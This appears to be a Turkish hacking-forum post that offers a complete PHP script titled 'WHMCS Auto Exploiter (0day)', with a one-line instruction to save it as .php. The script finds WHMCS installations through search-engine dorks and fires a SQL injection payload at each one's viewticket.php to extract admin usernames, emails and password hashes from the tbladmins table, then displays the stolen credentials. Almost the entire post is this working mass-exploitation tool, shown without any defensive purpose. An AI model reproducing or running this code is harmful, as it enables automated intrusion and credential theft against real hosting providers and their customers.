- Katılım
- 13 Ara 2015
- Tepki puanı
- 3,307
Rating - 0%
kullanimi:.php olarak kaydedin.
Kod:
<!--
<!DOCTYPE html>
<html>
<head>
<title>WHMCS Auto Exploiter</title>
<style type="text/css">
body{
background-color: black;
color: white;
}
textarea{
margin: 0px; width: 680px;
height: 226px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
margin-top: 30px;
}
input{
border: dashed 1px;
border-color: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
</style><link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
</head>
<body>
<font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
<br><font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font></font>
<form method="post">
<textarea name="ids"></textarea><br>
<input type="submit" value="whmcs hunter" id="button">
</form>
<center>
<?php
error_reporting(0);
set_time_limit(0);
class shc_hotbot
{
function letItBy(){
ob_flush(); flush();
}
function parseUrl($url) {
$r = "^(?:(?P<scheme>\w+)://)?";
$r .= "(?:(?P<login>\w+):(?P<pass>\w+)@)?";
$r .= "(?P<host>(?:(?P<subdomain>[\w\.]+)\.)?" . "(?P<domain>\w+\.(?P<extension>\w+)))";
$r .= "(?::(?P<port>\d+))?";
$r .= "(?P<path>[\w/]*/(?P<file>\w+(?:\.\w+)?)?)?";
$r .= "(?:\?(?P<arg>[\w=&]+))?";
$r .= "(?:#(?P<anchor>\w+))?";
$r = "!$r!"; // Delimiters
preg_match ( $r, $url, $out );
return $out;
}
function keyvol(){
$ch = curl_init("http://www.hotbot.com/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
preg_match("/\.val\('(.*?)'\);/",$result,$ke);
return $ke[1];
}
function search_hotbot($dork){
echo '[+] Search Target ... Pleas wait<br>';
$page = 1;
for ($i=0; $i<$page; $i++) {
$ch = curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_URL,"http://www.hotbot.com/search/web?pn=".$page."&q=".$dork."&keyvol=".$this->keyvol());
curl_setopt($ch,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch,CURLOPT_USERAGENT,'msnbot/1.0 (+http://search.msn.com/msnbot.htm)');
curl_setopt($ch,CURLOPT_ENCODING,"gzip, deflate, compress");
$data = curl_exec($ch);
preg_match_all('#<span class="web-baseuri">(.*?)</span>#',$data,$matches);
preg_match('/<title>(.*?)<\\/title>/', $data, $titles);
$links = array_unique($matches[1]);
if($titles[1]=="Search"){
echo '[+] Search Target ... Done!<br>';
}else{
foreach ($links as $key) {
echo $key."<br>";
$array[] = $key;
}
$page++;
}
$this->letItBy();
}
return $array;
}
function search_google($dork){
$resultPerPage=8;
$page=1;
for ($i=0; $i <$page; $i++) {
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($dork);
$resultFromGoogle = json_decode( file_get_contents($url, true) ,true);
if($resultFromGoogle['responseStatus']=="200"){
foreach ($resultFromGoogle['responseData']['results'] as $key => $value) {
$url = $this->parseUrl($value['unescapedUrl']);
$url = str_replace($url['file'], "viewticket.php", $url[0]);
$array[] = $url;
}
$page++;
}
}
return array_unique($array);
}
function whmcs($site){
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($site);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[1]){
return $infoz[1];
}
}
return false;
}
function whmcs_exploit($data){
foreach ($data as $key => $values) {
$exploit = $this->whmcs($values);
if($exploit){
echo '<div style="background-color: green;"><pre><h4>Site : <a href="'.$values.'">'.$values.'</a></h4></pre><br><textarea>';
foreach ($exploit as $key => $value) {
echo $value."\r\n";
}
echo '</textarea></div>';
}else{
echo '
<div style="background-color: red;">
<pre><h4>Site : <a href="'.$values.'">'.$values.'</a></h4></pre>
</div>';
}
$this->letItBy();
}
}
}
$shc = new shc_hotbot();
//$data = $shc->search("inurl:submitticket.php");
if($_POST['ids']){
$anu = explode("\r\n", $_POST['ids']);
foreach ($anu as $key => $value) {
$data = $shc->search_google($value);
$shc->whmcs_exploit($data);
$shc->letItBy();
}
}
?>
</center>
</body>
</html>
